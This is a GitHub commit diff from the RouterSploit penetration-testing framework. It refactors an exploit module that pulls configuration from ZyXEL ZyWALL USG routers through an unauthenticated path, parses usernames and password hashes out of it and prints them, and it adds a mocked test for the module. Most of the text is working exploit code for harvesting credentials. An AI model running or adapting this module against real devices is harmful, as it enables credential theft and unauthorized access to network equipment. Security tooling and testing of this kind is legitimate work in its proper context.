Fixing zywall_usg_extract_hashes and adding tests (#419)

b0622a29 · Marcin Bury · GitHub · 8800e62d · b0622a29 · b0622a29
Unverified Commit b0622a29 authored May 12, 2018 by Marcin Bury Committed by GitHub May 12, 2018
Showing with 32 additions and 15 deletions

zywall_usg_extract_hashes.py ...dules/exploits/routers/zyxel/zywall_usg_extract_hashes.py +11 -15

test_zywall_usg_extract_hashes.py .../exploits/routers/zyxel/test_zywall_usg_extract_hashes.py +21 -0

No files found.
--- a/routersploit/modules/exploits/routers/zyxel/zywall_usg_extract_hashes.py
+++ b/routersploit/modules/exploits/routers/zyxel/zywall_usg_extract_hashes.py
@@ -32,24 +32,14 @@ class Exploit(HTTPClient):
    ssl = OptBool("true", "SSL enabled: true/false")

    def __init__(self):
-        self.script_content = None
+        self.credentials = []

    def run(self):
+        self.credentials = []
+
        if self.check():
            print_success("Target appears to be vulnerable")
-
-            if self.script_content and len(self.script_content):
-                print_status("Parsing the script ...")
-                creds = []
-
-                for line in self.script_content.split("\n"):
-                    line = line.strip()
-                    m_groups = re.match(r'username (.*) password (.*) user-type (.*)', line, re.I | re.M)
-                    if m_groups:
-                        creds.append((m_groups.group(1), m_groups.group(2), m_groups.group(3)))
-
-                print_table(('Username', 'Hash', 'User type'), *creds)
-
+            print_table(("Username", "Hash", "User type"), *self.credentials)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

@@ -62,7 +52,13 @@ class Exploit(HTTPClient):
        )

        if response is not None and response.status_code == 200:
-            self.script_content = response.text
+            for line in response.text.split("\n"):
+                line = line.strip()
+                m_groups = re.match(r"username (.*) password (.*) user-type (.*)", line, re.I | re.M)
+                if m_groups:
+                    self.credentials.append((m_groups.group(1), m_groups.group(2), m_groups.group(3)))
+
+            if self.credentials:
                return True  # target is vulnerable

        return False  # target is not vulnerable
--- a/tests/exploits/routers/zyxel/test_zywall_usg_extract_hashes.py
+++ b/tests/exploits/routers/zyxel/test_zywall_usg_extract_hashes.py
+from routersploit.modules.exploits.routers.zyxel.zywall_usg_extract_hashes import Exploit
+
+
+def test_check_success(target):
+    """ Test scenario - successful check """
+
+    route_mock = target.get_route_mock("/cgi-bin/export-cgi/images/", methods=["GET"])
+    route_mock.return_value = (
+        "TEST\n"
+        "username TEST password TEST user-type TEST\n"
+        "TEST\n"
+    )
+
+
+    exploit = Exploit()
+    exploit.target = target.host
+    exploit.port = target.port
+    exploit.ssl = "false"
+
+    assert exploit.check()
+    assert exploit.run() is None